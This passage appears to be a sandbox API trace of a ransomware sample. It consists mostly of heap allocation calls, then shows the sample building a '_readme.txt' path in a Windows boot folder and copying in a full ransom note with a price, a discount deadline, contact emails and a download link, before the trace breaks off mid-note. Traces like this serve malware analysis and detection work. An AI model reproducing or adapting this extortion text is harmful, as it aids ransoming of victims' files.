lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.744] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.744] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.745] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.745] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.746] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.746] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.747] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.747] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.748] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.748] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.749] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.749] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0165.749] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.749] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.749] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.749] PathFindFileNameW (pszPath="") returned="" [0165.749] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.750] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.750] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.750] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.750] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0165.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.750] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.750] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0165.750] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.750] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is 